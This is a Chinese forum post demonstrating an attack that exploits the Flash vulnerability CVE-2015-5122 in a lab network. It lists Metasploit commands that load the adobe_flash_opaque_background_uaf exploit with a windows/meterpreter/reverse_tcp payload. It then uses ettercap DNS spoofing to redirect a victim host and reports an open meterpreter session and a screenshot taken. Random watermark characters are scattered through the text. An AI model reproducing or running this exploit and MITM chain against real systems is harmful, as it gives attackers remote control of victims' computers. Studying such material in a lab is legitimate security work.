找回密码
 立即注册
查看: 2288|回复: 0
打印 上一主题 下一主题

cve2015-5122漏洞实例演示虚拟机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

2 m, l# g, o n3 k 二、cve2015-5122漏洞实例演示虚拟机 ( W' E! l, l; y, o6 W: E' d

5 S$ d* `6 p/ k+ [2 U S/ i: _

* V1 ]" G3 T6 w   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: + H& U0 g' f6 h

" E+ D: I! ~$ R0 B: R

6 \$ t' u6 F- | search cve-2015-5122如图: , ]1 f2 g4 H3 s+ D3 B9 z

( w3 ` c0 M- ^7 a) V [: S9 C

0 l1 |. D+ T" e/ W8 g `   + G Y6 y; u) Z& z+ {' s

, j( G" c: B; s1 S

- G' n, C J7 L& b 下面我们敲如下命令: 5 Z% A7 w& `" ^3 R! u% U

0 O! w, Q; R/ J! V- q9 [2 s

! s& S, H. s. ?: X- _( d7 k1 ^# | use exploit/multi/browser/adobe_flash_opaque_background_uaf 5 e0 b5 }3 d$ |$ O/ K6 c& P

( b" R1 N: u$ S# _; J; v: m+ j

; K0 a! L3 u e o set PAYLOAD windows/meterpreter/reverse_tcp - h0 m' c0 V& p5 ], R

2 T$ x7 S1 U: M

* e7 A& N1 w8 g, v" S7 y7 y5 S, ~ set LHOST 192.168.0.109 5 D; k% Y+ Z* m

$ U5 B; U% G% z/ m) A" A: O( V

$ u. o Z0 g; c9 C" F/ h set URIPATH /                        /*根目录*/ 2 K9 C n% n0 y, J1 k7 T$ U

* u/ {/ n% \" \( F8 y8 E1 ` ?

3 \* ~7 g$ z. a* {* u' x* Z set SRVHOST 192.168.0.109  //192.168.0.109kaili ip地址 + R1 ]) |* V, b. }" l$ `

/ a' q( N E. p4 y

& x8 K1 o& ^* W# F, G set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 % E6 F( I( ]( a, M E6 a

& f' Q, G' d& U2 Z9 D

# p# ^- [: @6 _, G9 t 然后show options如图: 7 |! s i g" {& B) w ~# ^! O

. k( x* e# z& \

+ o2 ~9 F& H' p9 u9 L; Z   . P5 W6 b) ?- d9 w6 e

- s. V# o0 A+ T/ ^ A9 w- Q

" }& {$ a; l- T& r1 N( Y8 A 一切都设置好了,执行exploit下面我们进etc/ettercap目录下设置etc.dns如图:
2 p* y( W- G: C. m A* B( n
( d+ o- P9 k) s/ M

4 _ A7 {# w# ?* A, e$ }

6 [9 |7 Y* F/ b/ w5 I! S% Q. g6 N 然后ettercap -G命令打开ettercap,我们要攻击的主机ip192.168.0115 : ?: Q) p/ M9 x; s6 S& Y- z4 m

4 q' m Y( C5 P8 ~# v

0 J$ o6 K" } Z7 g J. k* M0 c Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf W3 A! v1 }! K: H2 u9 {

/ s4 K# T v9 X/ L* Z- F+ a3 E

8 p2 X6 g k1 |/ _   # X3 @ a' ?% m5 M. K Q

+ m+ z5 Z7 f# a: t3 V& K

; B, O# s1 }% M' I1 [. | 成功了,这时候我们断开ettercap,如图: ; F9 @$ w8 u; `% h% O

! j/ ? k9 q9 |! c" P6 b

/ o- N0 ?; v7 @$ U2 o. ^; M! w   ) }: m/ U" p1 h7 z3 Z

$ s1 p9 P* Y$ {4 f" P' B

$ n& a; F" |/ c3 F/ V6 t/ O( n X7 m Screenshot如图: . V$ [# r& D4 r7 v

; K4 q. Y" H+ T& }

: h9 }4 Y5 {6 {$ y   & ^9 W C V+ W4 H# N

, x% t/ x" D, \, ^1 w0 ]& C

1 h* q& Q/ @2 W/ x" `# Y# | 6 @6 }8 x' e7 X$ I

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表